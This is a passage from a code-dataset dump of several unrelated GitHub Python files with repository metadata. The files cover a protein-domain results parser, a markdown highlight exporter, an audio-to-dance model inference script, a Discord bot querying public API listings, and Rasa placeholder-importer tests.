generated_scripts.close()\n\nif __name__ == '__main__':\n run_shell()\n", "repo_name": "btel/bashflow", "sub_path": "bashflow/shell.py", "file_name": "shell.py", "file_ext": "py", "file_size_in_byte": 2333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.match", "line_number": 15, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 18, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 19, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 49, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 53, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "32360324596", "text": "import logging\nimport json\nimport re\n\nfrom collections import defaultdict\nfrom operator import attrgetter\n\nfrom synthaser import settings\nfrom synthaser.models import Domain\n\n\nLOG = logging.getLogger(__name__)\n\n\nDOMAINS = {}\n\n\ndef load_rules_json(json_file):\n with open(json_file) as fp:\n return json.load(fp)\n\n\ndef load_domains(rule_file):\n \"\"\"Loads domains from a synthaser rule file.\n\n Rule file domain schema:\n {\n 'name': KS,\n 'domains': [\n {\n 'accession': 'smart00825',\n 'name': 'PKS_KS'\n ...\n },\n ...\n ],\n ...\n }\n\n This function flattens the domain type array to create a\n dictionary of domain families, so these can be easily looked up\n directly from CD-Search rows.\n \"\"\"\n rules = load_rules_json(rule_file)\n domains = {\n family[\"accession\"]: {**family, \"type\": domain[\"name\"]}\n for domain in rules[\"domains\"]\n for family in domain[\"domains\"]\n }\n update_domains(domains)\n\n\ndef update_domains(domains):\n DOMAINS.clear()\n DOMAINS.update(domains)\n\n\n# Load defaults, stored in synthaser/domains.json\nload_domains(settings.RULE_FILE)\n\n\ndef domain_from_row(row):\n \"\"\"Parse a domain hit from a row in a CD-search results file.\n\n For example, a typical row might looks like:\n\n >>> print(row)\n Q#1 - >AN6791.2\\tspecific\\t225858\\t9\\t1134\\t0\\t696.51\\tCOG3321\\tPksD\\t-\\tcl09938\n\n Using this function will generate:\n\n >>> domain_from_row(row)\n PksD [KS] 9-1134\n\n Parameters:\n row (str): Tab-separated row from a CDSearch results file\n Returns:\n Domain: Instance of the Domain class containing information about this hit\n Raises:\n ValueError: If the domain in this row is not in the DOMAINS dictionary.\n \"\"\"\n (\n *_,\n pssm,\n start,\n end,\n evalue,\n bitscore,\n accession,\n domain,\n _,\n superfamily,\n ) = row.split(\"\\t\")\n\n if accession not in DOMAINS:\n raise ValueError(f\"'{domain}' not a synthaser key domain\")\n\n return Domain(\n pssm=pssm,\n type=DOMAINS[accession][\"type\"],\n domain=domain,\n start=int(start),\n end=int(end),\n evalue=float(evalue),\n bitscore=float(bitscore),\n accession=accession,\n superfamily=superfamily,\n )\n\n\ndef parse_rpsbproc(handle):\n \"\"\"Parse a results file generated by rpsblast->rpsbproc.\n\n This function takes a handle corresponding to a rpsbproc output file.\n local.rpsbproc returns a subprocess.CompletedProcess object, which contains the\n results as byte string in it's stdout attribute.\n \"\"\"\n # Sanitize input. Should work for either an open file handle (str, still contains \\n\n # when iterating) or byte-string stdout stored in a CompletedProcess object passed to this\n # function as e.g. process.stdout.splitlines()\n stdout = \"\\n\".join(\n line.decode().strip() if isinstance(line, bytes) else line.strip()\n for line in handle\n )\n\n # Files produced by rpsbproc have anchors for easy parsing. Each query sequence\n # is given a block starting/ending with QUERY/ENDQUERY, and domain hits for the\n # query with DOMAINS/ENDDOMAINS.\n query_pattern = re.compile(\n r\"QUERY\\tQuery_\\d+\\tPeptide\\t\\d+\\t([A-Za-z0-9.]+?)\\n\"\n r\"DOMAINS\\n(.+?)ENDDOMAINS\",\n re.DOTALL,\n )\n\n domains = defaultdict(list)\n for match in query_pattern.finditer(stdout):\n query = match.group(1)\n for row in match.group(2).split(\"\\n\"):\n try:\n domain = domain_from_row(row)\n except ValueError:\n continue\n domains[query].append(domain)\n\n return domains\n\n\ndef parse_cdsearch(handle):\n \"\"\"Parse a CD-Search results table and instantiate Domain objects for each hit.\n\n Parameters:\n handle (file): Open file handle corresponding to a CD-Search results file.\n Returns:\n results (dict): Lists of Domain objects keyed on the query they were found in.\n \"\"\"\n query_regex = re.compile(r\"Q#\\d+? - [>]?(.+?)\\t\")\n results = defaultdict(list)\n for row in handle:\n try:\n row = row.decode()\n except AttributeError:\n pass # in case rows are unicode\n if not row.startswith(\"Q#\") or row.isspace():\n continue\n query = query_regex.search(row).group(1)\n try:\n domain = domain_from_row(row)\n except ValueError:\n continue\n results[query].append(domain)\n return dict(results)\n\n\ndef filter_results(results, **kwargs):\n \"\"\"Build Synthase objects from a parsed results dictionary.\n\n Any additional kwargs are passed to _filter_domains.\n\n Parameters:\n results (dict): Grouped Domains; output from _parse_cdsearch_table.\n Returns:\n synthases (list): Synthase objects containing all Domain objects found in the CD-Search.\n \"\"\"\n filtered = {}\n for name, domains in results.items():\n domains = filter_domains(domains, **kwargs)\n if not domains:\n LOG.error(\"No domains remain after filtering for %s\", name)\n filtered[name] = domains\n return filtered\n\n\ndef is_fragmented_domain(one, two, coverage_pct=0.5, tolerance_pct=0.1):\n \"\"\"Detect if two adjacent domains are likely a single domain.\n\n This is useful in cases where a domain is detected with multiple small hits. For\n example, an NRPS may have two adjacent condensation (C) domain hits that are\n both individually too small and low-scoring, but should likely just be merged.\n\n If two hits are close enough together, such that the distance between the start\n of the first and end of the second is within some tolerance (default +-10%) of the\n total length of a domains PSSM, this function will return True.\n\n Parameters:\n one (Domain): Domain instance\n two (Domain): Domain instance\n coverage_pct (float):\n Conserved domain hit percentage coverage threshold. A hit is considered\n truncated if its total length is less than coverage_pct * CD length.\n tolerance_pct (float):\n Percentage of CD length to use when calculating acceptable lower/upper\n bounds for combined domains.\n Returns:\n True: Domain instances are likely fragmented and should be combined.\n False: Domain instances should be separate.\n \"\"\"\n if one.type != two.type:\n raise ValueError(\"Expected Domain instances of same type\")\n\n pssm_length = DOMAINS[one.accession][\"length\"]\n coverage = pssm_length * coverage_pct\n tolerance = pssm_length * tolerance_pct\n one_length, two_length = len(one), len(two)\n\n return (\n one_length < coverage\n and two_length < coverage\n and pssm_length - tolerance <= two.end - one.start <= pssm_length + tolerance\n and one_length + two_length > coverage\n )\n\n\ndef filter_domains(domains, by=\"evalue\", coverage_pct=0.5, tolerance_pct=0.1):\n \"\"\"Filter overlapping Domain objects and test adjcency rules.\n\n Adjacency rules are tested again here, in case they are missed within overlap\n groups. For example, the NRPS-para261 domain is not always entirely contained by\n a condensation domain, so should be caught by this pass.\n\n Parameters:\n domains (list): Domain instances to be filtered\n by (str): Metric used to choose representative domain hit (def. 'evalue')\n coverage_pct (float): Conserved domain coverage percentage threshold\n tolerance_pct (float): CD length tolerance percentage threshold\n Returns:\n list: Domain objects remaining after filtering\n \"\"\"\n\n domains = [\n choose_representative_domain(group, by)\n for group in group_overlapping_hits(domains)\n ]\n\n i, total = 1, len(domains)\n while i < total:\n if i + 1 == total:\n break\n previous, current = domains[i - 1 : i + 1]\n\n # When domains are likely together, e.g. two small C domain hits right next\n # to each other or multiple Methyltransf_X domains, extend its border\n if previous.type == current.type and is_fragmented_domain(\n previous, current, coverage_pct, tolerance_pct\n ):\n previous.end = current.end\n del domains[i]\n continue\n i += 1\n return domains\n\n\ndef choose_representative_domain(group, by=\"evalue\"):\n \"\"\"Select the best domain from a collection of overlapping domains.\n\n This function tests rules stored in `special_rules`, which are lambdas that\n take two variables. It sorts the group by e-value, then tests each rule using\n the container (first, best scoring group) against all other Domains in the\n group.\n\n If any test is True, the container type is set to the rule key and returned.\n Otherwise, this function will return the container Domain with no modification.\n\n Parameters:\n group (list): Overlapping Domain objects\n by (str):\n Measure to use when determining the best domain of the group. Choices:\n 'bitscore': return domain with highest bitscore (relative to threshold)\n 'evalue': return domain with lowest E-value\n 'length': return longest domain hit\n Returns:\n Domain:\n Highest scoring Domain in the group. If any special rules have been\n satisfied, the type of this Domain will be set to that rule\n (e.g. Condensation -> Epimerization).\n \"\"\"\n key_functions = {\n \"bitscore\": (lambda d: d.bitscore / DOMAINS[d.accession][\"bitscore\"], True),\n \"evalue\": (lambda d: d.evalue, False),\n \"length\": (lambda d: d.end - d.start, True),\n }\n\n if by not in key_functions:\n raise ValueError(\"Expected 'bitscore', 'evalue' or 'length'\")\n\n key, reverse = key_functions[by]\n\n return sorted(group, key=key, reverse=reverse)[0]\n\n\ndef group_overlapping_hits(domains):\n \"\"\"Iterator that groups Domain objects based on overlapping locations.\n\n Parameters:\n domains (list): Collection of Domain objects belonging to a Synthase\n Yields:\n group (list): Group of overlapping Domain objects\n \"\"\"\n sorted_domains = sorted(domains, key=attrgetter(\"start\"))\n\n if not sorted_domains:\n return\n\n # Initialise first group and initial upper bound\n first = sorted_domains.pop(0)\n group, border = [first], first.end\n\n for domain in sorted_domains:\n\n # New domain overlaps current run, so save and set new upper bound\n # Use 10bp to account for slight domain overlap between distinct groups\n if domain.start + 10 <= border:\n group.append(domain)\n border = max(border, domain.end)\n\n # Current run is over; yield and reset\n else:\n yield group\n group, border = [domain], domain.end\n\n # End the final run\n yield group\n\n\ndef parse(handle, mode=\"remote\", **kwargs):\n \"\"\"Parse CD-Search results.\n\n Any additional kwargs are passed to `synthases_from_results`.\n\n Parameters:\n handle (file):\n An open CD-Search results file handle. If you used the website to\n analyse your sequences, the file you should download is Domain hits,\n Data mode: Full, ASN text. When using a `CDSearch` object, this\n format is automatically selected.\n mode (str): Search mode ('local' or 'remote')\n Returns:\n list: A list of Synthase objects parsed from the results file.\n Raises:\n ValueError: Search mode not 'local' or 'remote'\n \"\"\"\n if mode == \"remote\":\n return filter_results(parse_cdsearch(handle), **kwargs)\n if mode == \"local\":\n return filter_results(parse_rpsbproc(handle), **kwargs)\n raise ValueError(\"Expected 'remote' or 'local'\")\n", "repo_name": "gamcil/synthaser", "sub_path": "synthaser/results.py", "file_name": "results.py", "file_ext": "py", "file_size_in_byte": 11896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "synthaser.settings.RULE_FILE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "synthaser.settings", "line_number": 59, "usage_type": "name"}, {"api_name": "synthaser.models.Domain", "line_number": 98, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 129, "usage_type": "call"}, {"api_name": "re.DOTALL", "line_number": 132, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 135, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 156, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 157, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 318, "usage_type": "call"}]} +{"seq_id": "19715917822", "text": "from mdutils.mdutils import MdUtils\nfrom mdutils import Html\nimport pandas\nfrom datetime import date\n\n\nclass Output:\n def __init__(self, config):\n self.config = config\n\n def to_file(self, doc_contents):\n title = doc_contents[\"title\"]\n author = doc_contents[\"author\"]\n date_today = str(date.today())\n highlights = doc_contents[\"highlights\"]\n\n mdFile = MdUtils(file_name=\"test\", title=title)\n mdFile.new_header(level=1, title=title)\n mdFile.new_line(author)\n\n mdFile.new_line(date_today)\n mdFile.new_header(level=2, title=\"Highlights\")\n mdFile.new_header(level=3, title=\"Important\")\n for i in highlights:\n if i[\"function\"] == \"important\":\n mdFile.write(i[\"text\"])\n mdFile.write(\"[@{}]\".format(doc_contents[\"citekey\"]))\n mdFile.write(\"\\n\\n\")\n\n mdFile.new_header(level=3, title=\"Definitions\")\n for i in highlights:\n if i[\"function\"] == \"definition\":\n mdFile.write(i[\"text\"])\n mdFile.write(\"[@{}]\".format(doc_contents[\"citekey\"]))\n mdFile.write(\"\\n\\n\")\n\n mdFile.new_header(level=3, title=\"Highlights\")\n for i in highlights:\n if i[\"function\"] == \"default\":\n mdFile.write(i[\"text\"])\n mdFile.write(\"[@{}]\".format(doc_contents[\"citekey\"]))\n mdFile.write(\"\\n\\n\")\n\n mdFile.new_header(level=3, title=\"Methodology\")\n for i in highlights:\n if i[\"function\"] == \"definition\":\n mdFile.write(i[\"text\"])\n mdFile.write(\"[@{}]\".format(doc_contents[\"citekey\"]))\n mdFile.write(\"\\n\\n\")\n\n mdFile.new_header(level=3, title=\"Follow-up\")\n for i in highlights:\n if i[\"function\"] == \"follow_up\":\n mdFile.write(i[\"text\"])\n mdFile.write(\"[@{}]\".format(doc_contents[\"citekey\"]))\n mdFile.write(\"\\n\\n\")\n\n mdFile.create_md_file()\n", "repo_name": "carlsmith23/extractor", "sub_path": "output.py", "file_name": "output.py", "file_ext": "py", "file_size_in_byte": 2027, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.date.today", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 14, "usage_type": "name"}, {"api_name": "mdutils.mdutils.MdUtils", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "32872124084", "text": "import librosa\nimport codecs\nimport json\nimport numpy as np\nimport os\nfrom keras.models import load_model\nfrom sklearn import preprocessing\nfrom dataLoader import dataLoader\n\nsound_name = 'audio.mp3'\nresults_path = 'outputs/convlstm/Results_' + sound_name\n\nmodel_path = 'outputs/convlstm/Checkpoints/'\nmodel_name = 'model.ckpt.0100.hdf5'\n\npath_to_data_test = 'dataset_master/DANCE_C_1' # For testing\n\nSPLIT = True\nSPLIT_LEN = 3\n\nrepertory_exist = False\n\n\ndef soundTest(sond_name):\n sound_path = 'soundTest/' + sond_name\n\n # Load the audio as a waveform `y`\n # Store the sampling rate as `sr`\n y, sr = librosa.load(sound_path, sr=44100, dtype='float32')\n hop_length = 1764\n n_fft = 1024\n\n acoustic_features = []\n\n n = len(y)\n nb_frames = 0\n\n for x in range(0, n - hop_length, hop_length):\n slice = y[x:hop_length + x]\n stfft = librosa.feature.melspectrogram(y=slice, sr=sr, hop_length=256, n_fft=n_fft)\n acoustic_features.append(stfft)\n nb_frames += 1\n acoustic_features = np.concatenate(acoustic_features, axis=1)\n return acoustic_features, nb_frames\n\n\ndef split_sequence(sequence, n_steps):\n \"\"\"\n\n :param sequence:\n :param n_steps:\n :return: a matrix where n_columns = n_step, and n_row = ( (len(sequence) - n_steps ) / stride ) + 1\n and stride = 1.\n \"\"\"\n n_steps = n_steps - 1\n X = list()\n for i in range(len(sequence)):\n # find the end of this pattern\n end_ix = i + n_steps\n # check if we are beyond the sequence\n if end_ix > len(sequence) - 1:\n break\n # gather input and output parts of the pattern\n seq_x = sequence[i:end_ix + 1]\n X.append(seq_x)\n return np.array(X)\n\n\ndef complete_sequence(sequence, n_steps):\n \"\"\"\n After using split sequence, the sequence is left with (samples - (n_steps -1), n_steps, n_features).\n this will complete the sequence to (samples, n_steps, n_features) with a the dat from thhe sequence.\n :param sequence:\n :param n_steps:\n :return: a sequence of size ((n_steps -1), n_steps, n_features) to add too the split sequence.\n \"\"\"\n X = list()\n for i in range(n_steps - 1):\n step = list()\n n_i = n_steps - i\n for j in range(n_i):\n step.append(sequence[0])\n for j in range(n_i, n_steps):\n l = 1\n step.append(sequence[l])\n l += 1\n step = np.array(step)\n X.append(step)\n return np.array(X)\n\n\ndef normalize_audio(data):\n #normalizer = preprocessing.Normalizer().fit(data)\n #data = normalizer.transform(data)\n std_scale = preprocessing.StandardScaler().fit(data)\n data = std_scale.transform(data)\n return data\n\n\ndef reshape_acoustic_features(data, start_pos, end_pos):\n n_frames = end_pos - start_pos\n x = data.shape[0]\n y = int(data.shape[1] / n_frames)\n data = np.reshape(data, (n_frames, x, y))\n data = np.expand_dims(data, axis=3)\n return data\n\n\ndef save(output, start_pos, end_pos, path):\n nb_data = output.shape[0]\n output = np.reshape(output, (nb_data, 23, 3))\n output = output.tolist()\n skeletons = {\"length\": nb_data, \"skeletons\": output}\n with open(path + '/skeletons.json', \"w\") as write_file:\n json.dump(skeletons, codecs.open(path + '/skeletons.json', 'w', encoding='utf-8'),\n separators=(',', ':'), sort_keys=True,\n indent=4)\n\n start_pos = int(start_pos)\n end_pos = int(end_pos)\n config = {\"start_position\": start_pos, \"end_position\": end_pos}\n\n with open(path + '/config.json', \"w\") as write_file:\n json.dump(config, write_file)\n\n\nif __name__ == '__main__':\n model = load_model(model_path + model_name)\n if SPLIT:\n testX, testy, motions_max, motions_min, start_position, end_position = dataLoader(\n path_to_data=path_to_data_test,\n split=True,\n split_len=SPLIT_LEN,\n measures=True)\n acoustic_features, nb_frames = soundTest(sound_name)\n acoustic_features = normalize_audio(acoustic_features)\n acoustic_features = reshape_acoustic_features(acoustic_features, start_pos=0, end_pos=nb_frames)\n input = split_sequence(acoustic_features, SPLIT_LEN)\n add = complete_sequence(acoustic_features, SPLIT_LEN)\n\n input_sequence = np.concatenate((add, input))\n output = model.predict(input)\n one = np.ones(output.shape)\n output = (output + one) * (motions_max - motions_min) / 2 + motions_min\n print(\"input shape = \", input.shape)\n print(\"output shape = \", output.shape)\n else:\n testX, testy, motions_max, motions_min, start_position, end_position = dataLoader(\n path_to_data=path_to_data_test,\n split=False,\n split_len=3,\n measures=True)\n acoustic_features, nb_frames = soundTest(sound_name)\n acoustic_features = normalize_audio(acoustic_features)\n acoustic_features = reshape_acoustic_features(acoustic_features, start_pos=0, end_pos=nb_frames)\n\n input = acoustic_features\n output = model.predict(input)\n one = np.ones(output.shape)\n output = (output + one) * (motions_max - motions_min) / 2 + motions_min\n print(\"input shape = \", input.shape)\n print(\"output shape = \", output.shape)\n\n if repertory_exist:\n save(output, start_position, end_position, path=os.getcwd() + '/' + results_path)\n else:\n\n try:\n os.mkdir(os.getcwd() + '/' + results_path)\n except OSError:\n print(\"Creation of the directory %s failed\" % os.getcwd() + '/' + results_path)\n quit()\n else:\n print(\"Successfully created the directory %s \" % os.getcwd() + '/' + results_path)\n\n save(output, start_position, end_position, path=os.getcwd() + '/' + results_path)\n", "repo_name": "GaspardMurat/musicToDance", "sub_path": "soundTest.py", "file_name": "soundTest.py", "file_ext": "py", "file_size_in_byte": 5890, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "librosa.load", "line_number": 29, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 40, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 111, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 115, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 115, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 124, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 128, "usage_type": "call"}, {"api_name": "dataLoader.dataLoader", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 143, "usage_type": "call"}, {"api_name": "dataLoader.dataLoader", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 159, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 165, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 169, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 169, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 171, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 174, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "71622934246", "text": "import discord\nimport requests\n\nimport re\n\n\ndef Find(string):\n regex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n url = re.findall(regex, string)\n return [x[0] for x in url]\n\n\nTOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\n\nclient = discord.Client()\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n if message.content.startswith('!api-category'):\n search = message.content\n search = search.replace('!api-category ', '')\n searchterms = ''.join([i for i in search if not i.isdigit()])\n\n if searchterms == '':\n await message.channel.send(\n 'Please use ```!api-category [name]```to get APIs of that category. The current categories'\n 'are Animals, Anime, Anti-Malware, Art&Design, Books, Business, Calendar, Cloud Storage'\n '&FileStorage, ContinuousIntegration, Cryptocurrency, CurrencyExchange, Data'\n 'Validation, Development, Dictionaries, Documents&Productivity, Environment, '\n 'Events, Finance, Food&Drink, Games&Comics, Geocoding, Government, Health, Jobs, '\n 'MachineLearning, Music, News, OpenData, OpenSourceProjects, Patent, Personality, '\n 'Photography, Science&Math, Security, Shopping, Social, Sports&Fitness, TestData'\n 'TextAnalysis, Tracking, Transportation, URLShorteners, Vehicle, Video, Weather.')\n else:\n url = 'https://api.publicapis.org/entries?category=' + searchterms + '&https=true'\n r = requests.get(url).text\n msg = ''\n if len(r) > 2000:\n for i in range(0, 1999):\n msg += r[i]\n else:\n msg = r\n AllA = Find(msg)\n outputstring = \"Here are some APIs from the \"\n outputstring += search\n outputstring += \" category: \"\n for i in range(len(AllA) - 1):\n index = str(i + 1)\n outputstring += \"Link \"\n outputstring += index\n outputstring += \": \"\n outputstring += str(AllA[i])\n outputstring += \" \\n\"\n await message.channel.send(outputstring)\n\n if message.content.startswith('!api-random'):\n Link = Find(requests.get('https://api.publicapis.org/random?auth=null').text)\n outputstring = \"Here's a random API! \\n\"\n outputstring += Link[0]\n\n await message.channel.send(outputstring)\n\n if message.content.startswith('!api-search'):\n desc = message.content\n minus = '!api-search '\n desc = desc.replace(minus, '')\n r = requests.get('https://api.publicapis.org/entries?description=' + desc + '&https=true').text\n if len(r) > 2000:\n for i in range(0, 1999):\n msg += r[i]\n else:\n msg = r\n \n AllAPIs = Find(msg)\n \n outputstring = \"Here are some APIs related to \"\n outputstring += desc\n outputstring += \": \\n\"\n \n for i in range (len(AllAPIs)-1):\n index = str(i+1) \n outputstring += \"Link \" \n outputstring += index \n outputstring += \": \" \n outputstring += str(AllAPIs[i])\n outputstring += \" \\n\"\n \n await message.channel.send(outputstring)\n \n\n if message.content.startswith('!stack-search'):\n searchterm = message.content\n searchterms = searchterm.replace('!stack-search ', '')\n r = requests.get(\n 'https://api.stackexchange.com/2.2/search?order=desc&sort=activity&intitle=' + searchterms + '&site=stackoverflow').text\n if len(r) > 2000:\n msg = ''\n for i in range(0, 1999):\n msg += r[i]\n AllQ = Find(msg)\n AllQ = [i for i in AllQ if 'questions' in i]\n\n outputstring = \"For your search for the following search terms: \"\n outputstring += searchterm\n outputstring += \" , we could find the following related links: \"\n for i in range(len(AllQ) - 1):\n index = str(i + 1)\n outputstring += \" \\n\"\n outputstring += \"Link \"\n outputstring += index\n outputstring += \": \"\n outputstring += str(AllQ[i])\n outputstring += \" \\n\"\n\n await message.channel.send(outputstring)\n\n\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n\n\nclient.run(TOKEN)\n", "repo_name": "TheVikJ/Devscord", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 4851, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.findall", "line_number": 9, "usage_type": "call"}, {"api_name": "discord.Client", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 61, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 71, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "30551773042", "text": "from typing import Any, Dict, List, Tuple\nfrom unittest import mock\n\nimport faker\nimport pytest\nfrom rasa.shared.nlu.training_data import loading\nfrom rasa.shared.nlu.training_data.message import Message\nfrom rasa.shared.nlu.training_data.training_data import TrainingData\n\nfrom rasam import PlaceholderImporter\n\n\n@pytest.mark.asyncio\nasync def test_get_nlu_data() -> None:\n training_data = TrainingData(\n training_examples=[\n Message.build(\"hello\", \"intent_test\"),\n Message.build(\"hello @name\", \"intent_test\"),\n Message.build(\"hello\"),\n ]\n )\n with mock.patch.object(loading, \"load_data\") as load_data, mock.patch.object(faker, \"Faker\") as Faker:\n faker_ = Faker()\n faker_.name.return_value = \"Nikola Tesla\"\n load_data.return_value = training_data\n\n importer = PlaceholderImporter()\n importer.config = {\"importers\": [{\"name\": \"rasam.PlaceholderImporter\"}]}\n importer._nlu_files = [\"test\"]\n new_training_data = await importer.get_nlu_data()\n\n faker_.seed_instance.assert_called_once_with(importer.DEFAULT_FAKE_DATA_COUNT)\n load_data.assert_called_once_with(\"test\", \"en\")\n message: Message\n expected_messages = [\n Message.build(\"hello\", \"intent_test\"),\n Message.build(\"hello Nikola Tesla\", \"intent_test\"),\n Message.build(\"hello\"),\n ]\n assert len(new_training_data.training_examples) == len(expected_messages)\n for message, expected in zip(new_training_data.training_examples, expected_messages):\n assert message.get(\"intent\") == expected.get(\"intent\")\n assert message.get(\"text\") == expected.get(\"text\")\n\n\n@pytest.mark.parametrize(\n \"test, text, fake_data, matches, count, expected\",\n [\n (\n \"simple test\",\n \"hello @name\",\n [\"Nikola Tesla\", \"Nikola Tesla\"],\n [(\"@name\", \"name\", 6)],\n 1,\n [\"hello Nikola Tesla\"],\n ),\n (\n \"2 fake data\",\n \"hello @name\",\n [\"Nikola Tesla\", \"Nikola Tesla\", \"Thomas Edison\", \"Thomas Edison\"],\n [(\"@name\", \"name\", 6)],\n 2,\n [\"hello Nikola Tesla\", \"hello Thomas Edison\"],\n ),\n ],\n)\n@mock.patch.object(faker, \"Faker\")\n@pytest.mark.asyncio\nasync def test_replace_placeholders(\n faker_: mock.Mock,\n test: str,\n text: str,\n fake_data: List[str],\n matches: List[Tuple[str, str, int]],\n count: int,\n expected: List[str],\n) -> None:\n faker_.name.side_effect = fake_data\n importer = PlaceholderImporter()\n message = Message.build(text)\n index = 0\n async for new_message in importer.replace_placeholders(message, faker_, matches, count):\n assert new_message.data.get(\"text\") == expected[index]\n index += 1\n assert index == count\n\n\n@pytest.mark.parametrize(\n \"test, text, fake_data, matches, expected\",\n [\n (\n \"single placeholder\",\n \"hello {name}\",\n {\"name\": [\"Nikola Tesla\"]},\n [(\"{name}\", \"name\", 6)],\n \"hello Nikola Tesla\",\n ),\n (\n \"repeated {} placeholders\",\n \"hello {name} and {name}\",\n {\"name\": [\"Thomas Edison\", \"Nikola Tesla\"]},\n [(\"{name}\", \"name\", 6), (\"{name}\", \"name\", 16)],\n \"hello Nikola Tesla and Thomas Edison\",\n ),\n (\n \"mixed repeated placeholders\",\n \"hello @name and {name}\",\n {\"name\": [\"Thomas Edison\", \"Nikola Tesla\"]},\n [(\"@name\", \"name\", 6), (\"{name}\", \"name\", 16)],\n \"hello Nikola Tesla and Thomas Edison\",\n ),\n (\n \"multiple placeholders\",\n \"call me on @day at {time}\",\n {\"day_of_week\": [\"Monday\"], \"time\": [\"12:00\"]},\n [(\"@day\", \"day\", 11), (\"{time}\", \"time\", 19)],\n \"call me on Monday at 12:00\",\n ),\n (\n \"single number\",\n \"{number}\",\n {\"random_choices\": [[\"integer\"]], \"integer\": [\"123\"]},\n [(\"{number}\", \"number\", 0)],\n \"123\",\n ),\n (\n \"multiple numbers\",\n \"add @number and @number\",\n {\"random_choices\": [[\"integer\"], [\"integer\"]], \"integer\": [\"456\", \"123\"]},\n [(\"@number\", \"number\", 4), (\"@number\", \"number\", 16)],\n \"add 123 and 456\",\n ),\n (\n \"single any\",\n \"{any}\",\n {\"random_choices\": [[\"name\"]], \"name\": [\"Nikola Tesla\"]},\n [(\"{any}\", \"any\", 0)],\n \"Nikola Tesla\",\n ),\n (\n \"multiple any\",\n \"I saw @any and @any\",\n {\"random_choices\": [[\"name\"], [\"name\"]], \"name\": [\"Thomas Edison\", \"Nikola Tesla\"]},\n [(\"@any\", \"any\", 6), (\"@any\", \"any\", 15)],\n \"I saw Nikola Tesla and Thomas Edison\",\n ),\n (\n \"@ placeholder followed by letters should not be replaced\",\n \"hello @names and @name\",\n {\"name\": [\"Thomas Edison\"]},\n [(\"@name\", \"name\", 17)],\n \"hello @names and Thomas Edison\",\n ),\n ],\n)\n@mock.patch.object(faker, \"Faker\")\n@pytest.mark.asyncio\nasync def test_replace_placeholders_in_text(\n faker_: mock.Mock,\n test: str,\n text: str,\n fake_data: Dict[str, List[str]],\n matches: List[Tuple[str, str, int]],\n expected: str,\n) -> None:\n for method, data in fake_data.items():\n getattr(faker_, method).side_effect = data\n importer = PlaceholderImporter()\n formatted_text = await importer.replace_placeholders_in_text(text, faker_, matches)\n assert formatted_text == expected, test\n\n\n@pytest.mark.parametrize(\n \"test, text, expected\",\n [\n (\"single curly braces\", \"hello {any}\", [(\"{any}\", \"any\", 6)]),\n 